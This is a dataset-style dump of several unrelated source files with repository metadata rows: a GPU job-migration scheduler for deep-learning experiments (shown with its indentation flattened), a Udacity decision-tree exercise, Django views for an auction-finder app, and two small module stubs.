def max_speedup_promotion(K80_free, V100_free, V100_job, promote_list, demote_list, force_demote):
num_demote = len(force_demote)
num_promote = len(promote_list)
V100_vacant = num_demote + V100_free
K80_vacant = num_promote + K80_free
global speedup_dict
if K80_vacant >= num_demote: # if more vacant K80s than demote jobs, always force demote
# selectively promote among active V100 jobs and promote list jobs
V100_qual = demote_list
#if 'idle' in V100_qual:
# V100_qual.remove('idle')
V100_pool = list(set(V100_qual).union(promote_list))
if num_promote <= V100_vacant: # promote all jobs as well
return promote_list, force_demote
else: # promote the top 4 jobs
pool_dict = {}
V100_avail = V100_vacant + len(V100_qual)
for job in V100_pool:
if job in speedup_dict:
pool_dict[job] = speedup_dict[job]
sorted_pool = sorted(pool_dict, key=pool_dict.get, reverse=True)[:V100_avail]
promotion_list = list(set(promote_list).intersection(sorted_pool))
demotion_list = list(set(demote_list).difference(sorted_pool))
if 'idle' in demotion_list:
demotion_list.remove('idle') # this includes force demotion
# lazy migration, for every V100 job from high speeup to low speedup and not in sorted_pool, compare it with
# K80 jobs in sorted_pool, from low speedup to high speedup. If difference within 0.2, replace the K80 job
# in sorted pool
for job_demote in sorted(pool_dict, key=pool_dict.get, reverse=True):
if job_demote in demotion_list:
for job_promote in sorted(pool_dict, key=pool_dict.get, reverse=False):
if job_promote in promotion_list:
if speedup_dict[job_promote] - speedup_dict[job_demote] < 0.1:
demotion_list.remove(job_demote)
promotion_list.remove(job_promote)
break
return promotion_list, demotion_list
# situations below won't happen
elif V100_vacant >= num_promote: # if more vacant V100s than promote jobs, always promote
# less vacant K80s than demote jobs, select worst among force demote list
pool_dict = {} # here the pool only includes force demote jobs
for job in force_demote:
if job in speedup_dict:
pool_dict[job] = speedup_dict[job]
sorted_pool = sorted(pool_dict, key=pool_dict.get, reverse=False)[:K80_vacant]
if len(sorted_pool) > 0:
raise ValueError('Bug, demotion shouldnt happen because no practical complete')
return promote_list, sorted_pool
else:
raise ValueError('Bug with max speedup promotion, condition not considered')
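# Demotion policy used while jobs are still arriving: keep the 8 lowest-speedup jobs (the K80 capacity) on
# the K80s and promote the rest, applying the same 0.1 lazy-migration margin.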
def min_speedup_demotion(K80_job, demote_list):
num_demote = len(demote_list)
global speedup_dict
# selectively demote among active K80 jobs and demote list jobs
K80_qual = list(set(list(K80_job.values())))
if 'idle' in K80_qual:
K80_qual.remove('idle')
K80_pool = list(set(K80_qual).union(demote_list))
if len(K80_pool) <= 8: # demote all jobs, no promotion
return [], demote_list[:] # must return a copy, otherwise the output points to the same address as input
else: # promote the top 4 jobs
pool_dict = {}
for job in K80_pool:
if job in speedup_dict:
pool_dict[job] = speedup_dict[job]
sorted_pool = sorted(pool_dict, key=pool_dict.get, reverse=False)[:8] # 8 least speedup jobs
demotion_list = list(set(demote_list).intersection(sorted_pool))
promotion_list = list(set(list(K80_job.values())).difference(sorted_pool))
if 'idle' in promotion_list:
promotion_list.remove('idle') # this includes force demotion
# lazy migration, for every V100 job from high speeup to low speedup and not in sorted_pool, compare it with
# K80 jobs in sorted_pool, from low speedup to high speedup. If difference within 0.2, replace the K80 job
# in sorted pool
for job_demote in sorted(pool_dict, key=pool_dict.get, reverse=True):
if job_demote in demotion_list:
for job_promote in sorted(pool_dict, key=pool_dict.get, reverse=False):
if job_promote in promotion_list:
if speedup_dict[job_promote] - speedup_dict[job_demote] < 0.1:
demotion_list.remove(job_demote)
promotion_list.remove(job_promote)
break
return promotion_list, demotion_list
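# Checkpoint handshake: wait for the job to report ckpt_qual (safe to checkpoint), tell the node daemon to
# save it (e.g. send_signal(node, 'save 50 pid 10000')), and start the migration-overhead timer that is
# closed out when the job later reports 'd_end' in thread_function below.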
def save_job(node, job): # save_job('c2176', '50')
# first wait for the job to be qualified for checkpointing
while True: # wait for ckpt_qual to be available
global ckpt_qual_dict
if ckpt_qual_dict['job'+job] == 1:
ckpt_qual_dict['job'+job] = 0
break
time.sleep(5)
global pid_dict
pid = pid_dict['job'+job]
send_signal(node, 'save ' + job + ' pid ' + pid) # 'save 50 pid 10000'
global ovhd_start
ovhd_start[job] = time.time()
time.sleep(3) # in case epoch_waste is communicate too frequently
# resume job
def resume_job(node, gpu, job): # resume_job('c2176', '3', '50')
cmd = 'resume ' + job + ' gpu ' + gpu
send_signal(node, cmd)
# start job
def start_job(node, gpu, job):
cmd = 'start ' + job + ' gpu ' + gpu
send_signal(node, cmd)
# function that checks the tensorboard log of currently running jobs and logs jobs that have finished the first epoch
# in a global list. Once it's done, it will be in a queue to be promoted to V100 for 3 more epochs.
def check_step1_complete(job_list):
log_path = '/scratch/li.baol/tsrbrd_log/job_runs/' + testcase + '/'
global step1_job
global V100_epoch_time
for job in job_list:
if job not in step1_job and job != 'idle':
log_dir = log_path + 'job' + job + '/*'
dirs = glob.glob(log_dir)
dirs.sort()
if len(dirs) > 0:
tc = dirs[0]
iterator = EventAccumulator(tc).Reload()
tag = 'loss'
try:
if len(iterator.Scalars(tag)) > 2: # this way we can collect one epoch time
wall_time = [t.wall_time for t in iterator.Scalars(tag)]
V100_epoch_time[job] = wall_time[1] - wall_time[0]
step1_job.append(job)
print('job' + job + ' has reached step1 complete')
except Exception:
pass
def check_step2_complete(job_list):
log_path = '/scratch/li.baol/tsrbrd_log/job_runs/' + testcase + '/'
global step1_job
global step2_job
global V100_epoch_time
global K80_epoch_time
global speedup_dict
for job in job_list:
if job in step1_job and job not in step2_job and job != 'idle':
log_dir = log_path + 'job' + job + '/*'
dirs = glob.glob(log_dir)
dirs.sort()
if len(dirs) > 1:
tc = dirs[1]
iterator = EventAccumulator(tc).Reload()
tag = 'loss'
try:
if len(iterator.Scalars(tag)) > 2: # this way we can collect one epoch time
wall_time = [t.wall_time for t in iterator.Scalars(tag)]
K80_epoch_time[job] = wall_time[1] - wall_time[0]
V100_time_step2 = V100_epoch_time[job]
K80_time_step2 = wall_time[1] - wall_time[0]
speedup = (K80_time_step2 - V100_time_step2) / K80_time_step2
speedup_dict[job] = speedup
step2_job.append(job)
print('job' + job + ' has reached step2 complete')
except Exception:
pass
############### first clear finish status of all jobs ####################
pid_dict = {}
for i in range(50):
job_name = 'job' + str(i + 1)
pid_dict[job_name] = 0
checkpoint_dict = {}
for i in range(50):
job_name = 'job' + str(i + 1)
checkpoint_dict[job_name] = 0
ckpt_qual_dict = {}
for i in range(50):
job_name = 'job' + str(i + 1)
ckpt_qual_dict[job_name] = 0
finish_dict = {}
for i in range(50):
job_name = 'job' + str(i + 1)
finish_dict[job_name] = 0
epoch_waste_dict = {}
for i in range(50):
job_name = 'job' + str(i + 1)
epoch_waste_dict[job_name] = 0
#################### background thread running TCP socket ########################
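# Listens for status messages from running jobs ('ckpt_qual', 'finish', 'pid', 'checkpoint', 'waste',
# 'b_end', 'c_end', 'd_end', '1st_epoch', 'completion') and updates the bookkeeping dicts accordingly.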
def thread_function():
# here listen on the socket
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server_address = (host_node, 10002)
print('starting up on {} port {}'.format(*server_address))
sock.bind(server_address)
sock.listen(5)
while True:
# Wait for a connection
connection, client_address = sock.accept()
try:
while True:
data = connection.recv(32)
if data:
data_str = data.decode('utf-8')
global K80_start_time
global V100_start_time, promote_start_time
global K80_job
                    global V100_job
global K80_time
global V100_time
global ovhd_a, ovhd_b, ovhd_c, ovhd_d, k80_1st, v100_1st, ovhd_start, overhead, ovhd_total
global b_start, c_start, d_start, completion
if 'ckpt_qual' in data_str:
global ckpt_qual_dict
job_name = data_str.split(' ')[0]
ckpt_qual_dict[job_name] = 1
elif 'finish' in data_str:
global finish_dict
job_name = data_str.split(' ')[0]
job = job_name.replace('job','')
finish_dict[job_name] = 1
JCT[job] = int(time.time() - job_start[job])
if job in list(K80_job.values()):
K80_time[job] += int(time.time() - K80_start_time[job])
elif job in list(V100_job.values()):
V100_time[job] += int(time.time() - V100_start_time[job])
elif 'pid' in data_str:
global pid_dict
job_name = data_str.split(' ')[0]
pid = data_str.split(' ')[2]
pid_dict[job_name] = pid
elif 'checkpoint' in data_str: # can only be received after save signal is sent
global checkpoint_dict
job_name = data_str.split(' ')[0]
job = job_name.replace('job','')
checkpoint_dict[job_name] = 1
ovhd_a[job].append(int(time.time() - ovhd_start[job]))
b_start[job] = time.time()
elif 'waste' in data_str:
global epoch_waste_dict
job_name = data_str.split(' ')[0]
epoch_waste_time = data_str.split(' ')[2]
epoch_waste_dict[job_name] += int(epoch_waste_time)
elif 'b_end' in data_str:
job_name = data_str.split(' ')[0]
job = job_name.replace('job','')
ovhd_b[job].append(int(time.time() - b_start[job]))
c_start[job] = time.time()
elif 'c_end' in data_str:
job_name = data_str.split(' ')[0]
job = job_name.replace('job','')
ovhd_c[job].append(int(time.time() - c_start[job]))
d_start[job] = time.time()
elif 'd_end' in data_str:
job_name = data_str.split(' ')[0]
job = job_name.replace('job','')
ovhd_d[job].append(int(time.time() - d_start[job]))
ovhd_total[job].append(int(time.time() - ovhd_start[job]))
if ovhd_start[job] != 0:
overhead[job] += int(time.time() - ovhd_start[job])
ovhd_start[job] = 0
if job in list(K80_job.values()):
K80_start_time[job] = time.time()
elif job in list(V100_job.values()):
V100_start_time[job] = time.time()
promote_start_time[job] = time.time()
elif '1st_epoch' in data_str: # 'job50 1st_epoch 35'
job_name = data_str.split(' ')[0]
job = job_name.replace('job','')
epoch_time = int(data_str.split(' ')[2])
if job in list(K80_job.values()):
k80_1st[job].append(epoch_time)
elif job in list(V100_job.values()):
v100_1st[job].append(epoch_time)
elif 'completion' in data_str: # 'job50 completion 0.33'
job_name = data_str.split(' ')[0]
job = job_name.replace('job','')
completion_portion = float(data_str.split(' ')[2])
completion[job] = completion_portion
if 'ckpt_qual' in data_str or 'finish' in data_str or 'checkpoint' in data_str:
print('received ' + data_str)
connection.sendall(b'success')
#time.sleep(5)
else:
break
finally:
connection.close()
x = threading.Thread(target=thread_function, daemon=True)
x.start()
###############################################################################
######################################################################
while True:
# termination condition:
# all the jobs have finished
################### check for finished jobs on K80 and V100 ##############################
for gpu, job in K80_job.items():
if job != 'idle':
if finish_dict['job'+job] == 1:
K80_used -= 1
K80_job[gpu] = 'idle'
print('K80 finished job: ' + job)
for gpu, job in V100_job.items():
if job != 'idle':
if finish_dict['job'+job] == 1:
V100_used -= 1
V100_job[gpu] = 'idle'
print('V100 finished job: ' + job)
if job in demote_list:
demote_list.remove(job)
################ check step1 finished job of K80 jobs and step 2 of V100 #################
check_step1_complete(list(V100_job.values()))
check_step2_complete(list(K80_job.values()))
for job in list(V100_job.values()):
if job not in qualified_job and job != 'idle':
x2 = 3600 / k80_time[job]
x1 = pwr_dict[job]
x3 = util_dict[job]
if x1 > 0:
if job in step1_job:
qualified_job.append(job)
print('job' + job + ' has been qualified for demotion')
speedup_pred = model.predict(np.array([x1, x2, x3]).reshape((1,-1)))[0] / 100
speedup_dict[job] = speedup_pred
predict_dict[job] = speedup_pred
################ make promotion decisions ########################
V100_free = V100_cap - V100_used
K80_free = K80_cap - K80_used
if all_jobs_started:
# this returns available jobs for promotion. Has to be qualified, and currently in K80, but not practically complete
promote_list = list(set(qualified_job).intersection(list(K80_job.values())).difference(pc_job))
else:
promote_list = []
# this returns job forced to be demoted. Currently in V100, and is practically complete
force_demote = list(set(list(V100_job.values())).intersection(pc_job))
# look at demote list
for gpu, job in V100_job.items():
if job != 'idle':
if job not in demote_list and job in step2_job and len(ovhd_total[job]) > 0:
job_speedup = speedup_dict[job] # 0.7
job_ovhd = np.mean(ovhd_total[job]) # 100
k80_1st_ovhd = np.mean(k80_1st[job]) - K80_epoch_time[job]
v100_1st_ovhd = np.mean(v100_1st[job]) - V100_epoch_time[job]
demote_qualify_time = (2 * job_ovhd + k80_1st_ovhd + v100_1st_ovhd) / job_speedup
if int(time.time() - promote_start_time[job]) > demote_qualify_time:
demote_list.append(job)
                    print('job' + job + ' qualified for demote for passing demote qualify time ' +
str(int(demote_qualify_time)))
elif job not in demote_list and job not in step2_job and job in qualified_job:
demote_list.append(job)
                print('job' + job + ' qualified for demote for profiling')
if len(promote_list) > 0 or len(demote_list) > 0:
if all_jobs_started:
promoted, demoted = max_speedup_promotion(K80_free, V100_free, V100_job, promote_list, demote_list, force_demote)
else:
promoted, demoted = min_speedup_demotion(K80_job, demote_list)
if len(promoted) > 0:
print('promoted jobs: ', promoted)
if len(demoted) > 0:
print('demoted jobs: ', demoted)
# stop all promoted jobs on K80
checkpoint_finish_check = []
for gpu, job in K80_job.items():
if job in promoted:
save_job(K80_node, job)
if finish_dict['job'+job] != 1:
K80_time[job] += int(time.time() - K80_start_time[job])
checkpoint_finish_check.append(job)
K80_job[gpu] = 'idle'
K80_used -= 1
# stop all demoted jobs on V100
for gpu, job in V100_job.items():
if job in demoted:
# make sure demoted step1 job doesn't get promoted back before finishing profiling
if job in step1_job and job not in step2_job:
speedup_dict[job] = 0.01
save_job(V100_node, job)
if finish_dict['job'+job] != 1:
V100_time[job] += int(time.time() - V100_start_time[job])
checkpoint_finish_check.append(job)
V100_job[gpu] = 'idle'
V100_used -= 1
demote_list.remove(job)
# wait for all GPUs to be available
if len(checkpoint_finish_check) > 0:
while True:
time.sleep(5)
for job in checkpoint_finish_check[:]:
if checkpoint_dict['job'+job] == 1: # checkpoint has finished, gpu is free
print(job + ' checkpointed successfully')
checkpoint_dict['job'+job] = 0 # reset it
checkpoint_finish_check.remove(job)
# also check if job already finished before sending checkpoint signal
elif finish_dict['job'+job] == 1:
print(job + ' finished before receiving checkpoint signal')
checkpoint_finish_check.remove(job)
if len(checkpoint_finish_check) == 0:
break
# resume promoted jobs on V100, make sure the gpu is idle
for job_new in promoted[:]:
if finish_dict['job'+job_new] != 1:
for gpu, job in V100_job.items():
if job == 'idle': # if gpu idle, schedule new job here
V100_job[gpu] = job_new
resume_job(V100_node, gpu, job_new)
num_mig[job_new] += 1
promoted.remove(job_new)
V100_used += 1
break
else: # job has already finished before checkpointing
promoted.remove(job_new)
# resume demoted jobs on K80, make sure the gpu is idle
for job_new in demoted[:]:
if finish_dict['job'+job_new] != 1:
for gpu, job in K80_job.items():
if job == 'idle': # if gpu idle, schedule new job here
resume_job(K80_node, gpu, job_new)
num_mig[job_new] += 1
K80_job[gpu] = job_new
demoted.remove(job_new)
K80_used += 1
break
else: # job has already finished before checkpointing
print('job'+job_new+' has finished before checkpointing')
demoted.remove(job_new)
# perform a check, make sure all promoted/demoted jobs are scheduled
if len(promoted) > 0 or len(demoted) > 0:
raise ValueError('Bug with promotion scheme, more jobs than free gpus')
################ submit new jobs to vacant K80 GPUs ############################
# check if there are vacant K80s
## yes: submit jobs from queue
## no: do nothing
if not all_jobs_started:
if V100_used < V100_cap:
V100_free = V100_cap - V100_used
for i in range(V100_free):
time_passed = int(time.time() - queue_timer)
if index < len(queue) and queue_dict[queue[index]] < time_passed: # make sure job has arrived in the queue
job_new = str(queue[index])
for gpu, job in V100_job.items():
if job == 'idle': # schedule new job here if idle
start_job(V100_node, gpu, job_new)
V100_job[gpu] = job_new
job_start[job_new] = time.time()
V100_start_time[job_new] = time.time()
index += 1
V100_used += 1
time.sleep(5) # don't communicate too often
break
elif index >= len(queue):
all_jobs_started = True
############## monitor GPU usage ############
usage = K80_used + V100_used
time_stamp = int(time.time() - queue_timer)
gpu_usage_time.append(time_stamp)
gpu_usage.append(usage)
total_completion = np.sum(list(completion.values()))
gpu_usage_completion.append(total_completion)
############### wait for next iteration
time.sleep(INTERVAL)
################ check if termination condition is met ################
K80_idle_num = sum(value == 'idle' for value in K80_job.values())
V100_idle_num = sum(value == 'idle' for value in V100_job.values())
if K80_idle_num == K80_cap and V100_idle_num == V100_cap and index == len(queue):
print('all jobs are finished!')
break
# get average JCT
average_JCT = np.average(list(JCT.values()))
JCT['average'] = average_JCT
average_overhead = np.average(list(overhead.values()))
overhead['average'] = average_overhead
# after everything is finished
print('finished all runs')
JCT_name = testcase + '_JCT.json'
overhead_name = testcase + '_overhead.json'
num_mig_name = testcase + '_num_mig.json'
epoch_waste_name = testcase + '_epoch_waste.json'
ckpt_qual_name = 'ckpt_qual.json'
finish_name = 'finish.json'
K80_time_name = testcase + '_K80_time.json'
V100_time_name = testcase + '_V100_time.json'
gpu_usage_name = testcase + '_gpu_usage.csv'
ovhd_a_name = testcase + '_ovhd_a.json'
ovhd_b_name = testcase + '_ovhd_b.json'
ovhd_c_name = testcase + '_ovhd_c.json'
ovhd_d_name = testcase + '_ovhd_d.json'
ovhd_total_name = testcase + '_ovhd_total.json'
k80_1st_name = testcase + '_k80_1st.json'
v100_1st_name = testcase + '_v100_1st.json'
speedup_name = 'speedup.json'
predict_name = 'predict.json'
demote_list_name = 'demote_list.json'
completion_name = 'completion.json'
with open(JCT_name, 'w') as fp1:
json.dump(JCT, fp1, sort_keys=True, indent=4)
with open(overhead_name, 'w') as fp3:
json.dump(overhead, fp3, sort_keys=True, indent=4)
with open(num_mig_name, 'w') as fp3:
json.dump(num_mig, fp3, sort_keys=True, indent=4)
with open(epoch_waste_name, 'w') as fp3:
json.dump(epoch_waste_dict, fp3, sort_keys=True, indent=4)
with open(ckpt_qual_name, 'w') as fp1:
json.dump(ckpt_qual_dict, fp1, sort_keys=True, indent=4)
with open(finish_name, 'w') as fp1:
json.dump(finish_dict, fp1, sort_keys=True, indent=4)
with open(K80_time_name, 'w') as fp3:
json.dump(K80_time, fp3, sort_keys=True, indent=4)
with open(V100_time_name, 'w') as fp3:
json.dump(V100_time, fp3, sort_keys=True, indent=4)
with open(ovhd_a_name, 'w') as fp3:
json.dump(ovhd_a, fp3, sort_keys=True, indent=4)
with open(ovhd_b_name, 'w') as fp3:
json.dump(ovhd_b, fp3, sort_keys=True, indent=4)
with open(ovhd_c_name, 'w') as fp3:
json.dump(ovhd_c, fp3, sort_keys=True, indent=4)
with open(ovhd_d_name, 'w') as fp3:
json.dump(ovhd_d, fp3, sort_keys=True, indent=4)
with open(ovhd_total_name, 'w') as fp3:
json.dump(ovhd_total, fp3, sort_keys=True, indent=4)
with open(k80_1st_name, 'w') as fp3:
json.dump(k80_1st, fp3, sort_keys=True, indent=4)
with open(v100_1st_name, 'w') as fp3:
json.dump(v100_1st, fp3, sort_keys=True, indent=4)
with open(speedup_name, 'w') as fp1:
json.dump(speedup_dict, fp1, sort_keys=True, indent=4)
with open(predict_name, 'w') as fp1:
json.dump(predict_dict, fp1, sort_keys=True, indent=4)
with open(demote_list_name, 'w') as fp1:
json.dump(demote_list, fp1, sort_keys=True, indent=4)
with open(completion_name, 'w') as fp1:
json.dump(completion, fp1, sort_keys=True, indent=4)
gpu_usage_time = np.asarray(gpu_usage_time)
gpu_usage = np.asarray(gpu_usage)
gpu_usage_completion = np.asarray(gpu_usage_completion)
rows = zip(gpu_usage_time, gpu_usage, gpu_usage_completion)
with open(gpu_usage_name, 'w') as f:
writer = csv.writer(f)
for row in rows:
writer.writerow(row)
| [
"[email protected]"
]
| |
ab12cc2538c903dfca478ff16c8508153a7312c9 | 994ea22f35c635fdf139af9282b0d3a3d86ea34a | /ud120-projects-intro_to_machine_learning/decision_tree/dt_author_id.py | 667e184f992ddbc3679ee4787f6ce8ba6bcc894a | []
| no_license | zjyx147/Udacity | ac371fbc5b5b456e88b411657ef5a28c3b071c6c | d86fadd537dbacc6f8142b043e71527b0448bae3 | refs/heads/master | 2022-06-23T14:25:41.242353 | 2019-06-20T20:12:13 | 2019-06-20T20:12:13 | 191,207,247 | 0 | 0 | null | 2022-06-21T22:07:35 | 2019-06-10T16:42:18 | DIGITAL Command Language | UTF-8 | Python | false | false | 1,128 | py | #!/usr/bin/python
"""
This is the code to accompany the Lesson 3 (decision tree) mini-project.
Use a Decision Tree to identify emails from the Enron corpus by author:
Sara has label 0
Chris has label 1
"""
import sys
from time import time
sys.path.append("../tools/")
from email_preprocess import preprocess
### features_train and features_test are the features for the training
### and testing datasets, respectively
### labels_train and labels_test are the corresponding item labels
features_train, features_test, labels_train, labels_test = preprocess()
#########################################################
### your code goes here ###
from sklearn import tree
from sklearn.metrics import accuracy_score
#features_train = features_train[:len(features_train)/100]
#labels_train = labels_train[:len(labels_train)/100]
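# min_samples_split=40 stops the tree from splitting very small nodes, keeping it smaller
# and faster to train than the default of 2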
clf = tree.DecisionTreeClassifier(min_samples_split=40)
clf.fit(features_train, labels_train)
pred = clf.predict(features_test)
print len(features_train[0])
print "accuracy: ", accuracy_score(pred, labels_test)
#########################################################
| [
"[email protected]"
]
| |
fd11ad2bc7dc9769012fedd041968541efec6284 | 9c21e49150c99751231ad399bdba1850bb60c88c | /finders/views.py | 2810a5c9ef7cfcac6aa72c7420545809a1090294 | [
"MIT"
]
| permissive | netvigator/auctions | 3ab4086cb0bfbc736b17ede4e928f3ead2b08a4c | fc3766226cc65ac8694dffc74e893ecff8e7d07c | refs/heads/main | 2023-05-25T15:55:01.249670 | 2023-05-06T14:51:12 | 2023-05-06T14:51:12 | 92,816,101 | 0 | 0 | MIT | 2023-02-16T05:24:34 | 2017-05-30T09:14:39 | Python | UTF-8 | Python | false | false | 10,419 | py | from django.conf import settings
from core.views import ( DetailViewGotModel, ListViewGotModel,
UpdateViewCanCancel, CreateViewCanCancel )
from django.http import HttpResponseRedirect
from .forms import ItemFoundForm, UserItemFoundForm
from .mixins import AnyReleventHitStarColsChangedMixin
from .models import ItemFound, UserItemFound, UserFinder
from core.mixins import ( GetPaginationExtraInfoInContext,
GetUserSelectionsOnPost,
TitleSearchMixin )
from core.utils import ( getDateTimeObjGotEbayStr, getEbayStrGotDateTimeObj,
sayMoreAboutHitsForThis )
from brands.models import Brand
from categories.models import Category
from models.models import Model
# ### views assemble presentation info ###
# ### keep views thin! ###
if settings.TESTING:
#
from pprint import pprint
#
maybePrint = print
maybePrettyP = pprint
#
else:
#
def maybePrint( *args ): pass
def maybePrettyP( *args ): pass
#
class FinderIndexView(
GetUserSelectionsOnPost,
GetPaginationExtraInfoInContext,
TitleSearchMixin,
ListViewGotModel ):
template_name = 'finders/index.html'
model = UserFinder
context_object_name = 'finders_list'
paginate_by = 100
def get_queryset( self ):
#
# ADS
# qs = super().get_queryset()
# sSelect = 'P'
#
# ListViewGotModel inherits from GetUserOrVisitingMixin
oUser, isVisiting = self.getUserOrVisiting()
#
sSelect = self.kwargs.get( 'select', 'A' )
#
if not sSelect: sSelect = 'A'
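# sSelect codes: 'A' = all finders, 'D' = items excluded from the list ("deleted"), 'S' = title search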
#
if sSelect == 'A': # all
qsGot = UserFinder.objects.filter(
iUser = oUser,
bListExclude = False,
).order_by( '-iHitStars', 'iMaxModel', 'tTimeEnd' )
#elif sSelect == 'P': # postive (non-zero hit stars)
# qsGot = UserFinder.objects.filter(
# iUser = oUser,
# iHitStars__isnull = False,
# bListExclude = False,
# ).order_by( '-iHitStars', 'iMaxModel', 'tTimeEnd' )
#
elif sSelect == 'D': # "deleted" (excluded from list)
qsGot = UserFinder.objects.filter(
iUser = oUser,
iHitStars__isnull = False,
bListExclude = True
).order_by( '-iHitStars', 'iMaxModel', 'tTimeEnd' )
#elif sSelect == 'Z': # iHitStars = 0
# qsGot = UserFinder.objects.filter(
# iUser = oUser,
# iHitStars = 0,
# bListExclude = False
# ).order_by( '-iHitStars', 'iMaxModel', 'tTimeEnd' )
#
elif sSelect == 'S': # Search
#
qsGot = super().get_queryset()
#
# want to find the get_queryset() method of TitleSearchMixin
# not the get_queryset() method of ListViewGotModel
#
#
return qsGot
class ItemFoundDetailView( GetUserSelectionsOnPost, DetailViewGotModel ):
# get this from the finders list (top menu item)
model = UserFinder
parent = ItemFound
template_name = 'finders/detail.html'
form_class = UserItemFoundForm
def get_context_data( self, **kwargs ):
'''
want more info to the context data.
'''
context = super().get_context_data( **kwargs )
# qsThisItem = UserItemFound.objects.filter(
#
'''
{'object': <UserItemFound: FISHER FM 200 B FM STEREO TUBE TUNER 200B>,
'useritemfound': <UserItemFound: FISHER FM 200 B FM STEREO TUBE TUNER 200B>,
'view': <finders.views.ItemFoundDetailView object at 0x7f0669fa63c8>,
'model': <class 'finders.models.UserItemFound'>,\
'parent': <class 'finders.models.ItemFound'>}
'''
#
# DetailViewGotModel inherits from GetUserOrVisitingMixin
oUser, isVisiting = self.getUserOrVisiting()
#
qsThisItemAllHits = UserItemFound.objects.filter(
iItemNumb_id = context[ 'object' ].iItemNumb_id,
iUser = oUser,
bListExclude = False,
).order_by( '-iHitStars' )
#
if len( qsThisItemAllHits ) == 0:
#
qsThisItemAllHits = UserItemFound.objects.filter(
iItemNumb_id = context[ 'object' ].iItemNumb_id,
iUser = oUser,
).order_by( '-iHitStars' )
#
#
sayMoreAboutHitsForThis( qsThisItemAllHits )
#
context['HitsForThis'] = qsThisItemAllHits
#
context['isVisiting'] = isVisiting
#
session = self.request.session
#
session['iItemNumb' ] = context[ 'object' ].iItemNumb_id
#
if len( qsThisItemAllHits ) == 0:
session['iSearch'] = None
else:
session['iSearch'] = qsThisItemAllHits[0].iSearch_id
#
# cannot serialize datetime object, so covert to string
#
session['sTimeEnd' ] = getEbayStrGotDateTimeObj(
context[ 'object' ].tTimeEnd )
#
return context
"""
class ItemFoundHitView( GetUserSelectionsOnPost, DetailViewGotModel ):
# get this from the list at bottom for a model, brand or category
model = UserItemFound
parent = ItemFound
template_name = 'finders/hit-detail.html'
form_class = UserItemFoundForm
def get_context_data( self, **kwargs ):
'''
want more info to the context data.
'''
context = super().get_context_data( **kwargs )
#
# qsThisItem = UserItemFound.objects.filter(
#
'''
{'object': <UserItemFound: FISHER FM 200 B FM STEREO TUBE TUNER 200B>,
'useritemfound': <UserItemFound: FISHER FM 200 B FM STEREO TUBE TUNER 200B>,
'view': <finders.views.ItemFoundDetailView object at 0x7f0669fa63c8>,
'model': <class 'finders.models.UserItemFound'>,\
'parent': <class 'finders.models.ItemFound'>}
'''
#
qsThisItemOtherHits = UserItemFound.objects.filter(
iItemNumb_id = context[ 'object' ].iItemNumb_id,
iUser = context[ 'object' ].iUser,
bListExclude = False
).exclude( id = context[ 'object' ].id
).order_by( '-iHitStars' )
#
context['HitsForThis'] = qsThisItemOtherHits
#
session = self.request.session
#
session['iItemNumb'] = context[ 'object' ].iItemNumb_id
#
session['iSearch'] = \
context['object'].iSearch_id or qsThisItemOtherHits[0].iSearch_id
#
return context
"""
class ItemFoundUpdateView(
AnyReleventHitStarColsChangedMixin, UpdateViewCanCancel ):
model = UserItemFound
parent = ItemFound
template_name = 'finders/edit.html'
success_message = 'Finder update successfully saved!!!!'
form_class = UserItemFoundForm
tHitStarRelevantCols = (
'iModel',
'iBrand',
'iCategory' )
def get_context_data( self, **kwargs ):
'''
want more info to the context data.
'''
#
context = super().get_context_data( **kwargs )
#
context['form'].fields['iBrand'].queryset = \
Brand.objects.filter( iUser = self.request.user )
context['form'].fields['iCategory'].queryset = \
Category.objects.filter( iUser = self.request.user )
#
instance = context['form'].instance
#
if instance.iBrand is not None:
context['form'].fields['iModel'].queryset = \
Model.objects.filter(
iUser = self.request.user,
iBrand = instance.iBrand )
else:
context['form'].fields['iModel'].queryset = \
Model.objects.filter( iUser = self.request.user )
#
# session = self.request.session
#
# print( "instance.iItemNumb_id:", instance.iItemNumb_id )
# print( "instance.iBrand:", instance.iBrand )
# print( "session['iItemNumb'] :", session['iItemNumb'] )
#
return context
class ItemFoundCreateView( CreateViewCanCancel ):
model = UserItemFound
parent = ItemFound
template_name = 'finders/add.html'
success_message = 'New finder successfully saved!!!!'
form_class = UserItemFoundForm
def get_initial( self ):
#
initial = super().get_initial()
#
# in testing, values might not be there
#
session = self.request.session
#
if session and 'iItemNumb' in session:
#
initial['iItemNumb'] = session['iItemNumb']
initial['iSearch' ] = session['iSearch' ]
initial['tTimeEnd' ] = getDateTimeObjGotEbayStr( session['sTimeEnd' ] )
initial['iUser' ] = self.request.user
#
#
return initial
def troubleshoot_form_valid( self, form ):
#
instance = form.instance
#session = self.request.session
##
#instance.iItemNumb_id = instance.iItemNumb_id or session['iItemNumb']
#instance.iSearch_id = instance.iSearch_id or session['iSearch' ]
#instance.tTimeEnd = instance.tTimeEnd or session['tTimeEnd' ]
#instance.iUser = self.request.user
#
maybePrint( 'iItemNumb_id, iSearch_id, tTimeEnd, iUser:',
instance.iItemNumb_id,
instance.iSearch_id,
instance.tTimeEnd,
instance.iUser )
#
return super().form_valid( form )
| [
"[email protected]"
]
| |
d56e7846c82c52f70ed8995eae5b8812797b0c59 | 8f6aa9ac9c8c2e409875bbf36fbc49b3eb37d88b | /enthought/blocks/parser_.py | f1a794e50470f6bace4dc005a1697707cf3acf70 | [
"BSD-3-Clause",
"LicenseRef-scancode-unknown-license-reference"
]
| permissive | enthought/etsproxy | 5660cf562c810db2ceb6b592b6c12274bce96d73 | 4aafd628611ebf7fe8311c9d1a0abcf7f7bb5347 | refs/heads/master | 2023-03-27T04:51:29.297305 | 2020-12-02T09:05:18 | 2020-12-02T09:05:18 | 1,632,969 | 3 | 1 | NOASSERTION | 2020-12-02T09:05:20 | 2011-04-18T22:29:56 | Python | UTF-8 | Python | false | false | 93 | py | # proxy module
from __future__ import absolute_import
from codetools.blocks.parser_ import *
| [
"[email protected]"
]
| |
c9bbb18d49a220a9c5dba67e26b75ee3e9d1b3c3 | ad1ff82d1361f76b043faa304aa3b7be3652b303 | /tools/supervisor.py | 40f2f0a9c939658268aa3ae39a028bf539add829 | []
| no_license | jon--lee/aor | 3a0f92e345a88c347146acba4b9f7513a3a986cf | 4a4cd8800dfc209c382507740e68586b34178a1b | refs/heads/master | 2020-06-10T05:31:51.179020 | 2019-06-24T23:48:24 | 2019-06-24T23:48:24 | 193,597,583 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 986 | py | import numpy as np
from expert import tf_util
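# Thin wrappers exposing a uniform sample_action/intended_action interface around different
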